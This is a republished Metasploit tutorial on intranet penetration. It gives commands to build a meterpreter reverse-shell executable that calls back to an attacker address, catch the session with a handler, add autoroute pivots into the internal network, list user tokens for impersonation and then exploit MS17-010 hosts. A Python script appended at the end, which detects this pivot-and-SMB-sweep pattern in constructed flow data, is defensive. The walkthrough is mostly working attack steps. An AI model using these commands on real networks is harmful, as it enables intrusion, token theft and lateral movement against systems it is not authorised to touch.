2025-03-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/01 Report--
Today I will walk through how Metasploit's routing and forwarding feature can be used for intranet penetration, a topic that many people do not understand well. To make it easier to follow, I have summarized the key points below; I hope you get something out of this article.
Background
During a penetration test we often run into this scenario: we have compromised an intranet server through a web application, and to go further into the intranet we use that compromised host as a springboard (pivot) to reach the rest of the internal network and expand our results.
The hypothetical scenario here is that we already have remote desktop access to an intranet server, and during the intranet phase we find a large number of internal hosts that are still vulnerable to MS17-010. To take those hosts we could use the NSA toolkit, but that toolkit is quite cumbersome. A simpler idea is to use the compromised host as a springboard so that intranet hosts can be attacked directly from the MSF framework. MSF provides a convenient pivoting module for exactly this purpose: it can add a forwarding route into the intranet.
Procedure
Attacker IP: 192.168.1.106, listening port: 1234
Target IP: 192.168.1.108
1. Generate the payload file on the attacker machine
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe
2. Start the reverse-connection handler in msf
root@kali:~# msfconsole
msf > use exploit/multi/handler
3. Set the payload that the reverse connection will use
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
4. View the configuration options
msf exploit(multi/handler) > show options
5. Set the IP and port that the payload will connect back to
msf exploit(multi/handler) > set LHOST 192.168.1.106
msf exploit(multi/handler) > set LPORT 1234
6. When the target host runs payload.exe, the handler receives the reverse shell
msf exploit(multi/handler) > run
The MSF springboard (pivot) function
The springboard function of MSF is the routing and forwarding capability built into the framework. It works by adding a route to the "intranet" on top of an already established meterpreter session, so that msf itself can reach intranet resources that are not directly accessible from the attacker machine. As long as the route can reach a host, the full functionality of msf is available against it.
Gather information about the target's private network
run get_local_subnets
--> obtain the private network address segments of the compromised target
run autoroute -s 192.168.1.0/24
--> add a route to the whole C-class segment of a valid NIC through this session
run autoroute -p
--> print the active routes
use incognito
--> load the incognito token-manipulation module
list_tokens -u
--> list the user tokens available on the current target host
Add a forwarding route to the destination network segment
run autoroute -s <subnet>
Verify that the route was added
run autoroute -p
Once the route into the intranet is in place, the MSF platform can scan the intranet hosts directly and exploit high-risk vulnerabilities on them without any extra tooling.
After reading the above, do you have a better understanding of how Metasploit routing and forwarding can achieve intranet penetration? If you want to learn more, please follow the industry information channel. Thank you for your support.
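From the defender's side, the pivot described above leaves a recognisable footprint: an internal host first holds an outbound connection to an external address on an uncommon port (the reverse_tcp handler), then fans out to many internal hosts on SMB (the MS17-010 sweep). The following detection logic is an added example, not code from the original post; the flow records, the RFC 1918 internal ranges and the thresholds are constructed assumptions.

```python
"""Flag hosts that show the pivot-then-scan pattern in flow records (constructed data)."""
from collections import defaultdict
import ipaddress

# Constructed sample flow records: (timestamp, src_ip, dst_ip, dst_port)
SAMPLE_FLOWS = [(100, "10.0.5.20", "203.0.113.9", 1234)]          # outbound reverse shell (constructed C2)
SAMPLE_FLOWS += [(101 + i, "10.0.5.20", f"10.0.5.{21 + i}", 445)   # SMB sweep through the pivot
                 for i in range(6)]
SAMPLE_FLOWS += [(110, "10.0.5.30", "10.0.5.40", 445),            # single normal file-share access
                 (111, "10.0.9.9", "10.0.5.50", 445),             # SMB with no prior external session
                 (112, "10.0.9.9", "10.0.5.51", 445)]

# Assumption: RFC 1918 space is "internal"; anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumption: outbound connections to these ports are common enough not to be suspicious on their own.
COMMON_EGRESS_PORTS = {80, 443, 53, 22, 25, 123}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_pivot_hosts(flows, smb_port=445, fanout_threshold=5):
    """Return {src_ip: [internal SMB targets]} for every source that (1) opened an
    outbound connection to an external IP on an uncommon port and (2) afterwards
    contacted at least `fanout_threshold` distinct internal hosts on `smb_port`."""
    first_egress = {}                 # src_ip -> timestamp of first suspicious outbound flow
    fanout = defaultdict(set)         # src_ip -> internal SMB destinations seen after that flow
    for ts, src, dst, port in sorted(flows):
        if not is_internal(dst) and port not in COMMON_EGRESS_PORTS:
            first_egress.setdefault(src, ts)
        elif is_internal(dst) and port == smb_port and src in first_egress and ts >= first_egress[src]:
            fanout[src].add(dst)
    return {src: sorted(dsts) for src, dsts in fanout.items() if len(dsts) >= fanout_threshold}


if __name__ == "__main__":
    for host, targets in find_pivot_hosts(SAMPLE_FLOWS).items():
        print(f"possible pivot host {host}: SMB fan-out to {len(targets)} internal hosts")
```

The host that only performs the SMB sweep (10.0.9.9) is deliberately not flagged, so that ordinary vulnerability scanners are not reported; correlate it with a separate scanner-detection rule instead.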
© 2024 shulou.com SLNews company. All rights reserved.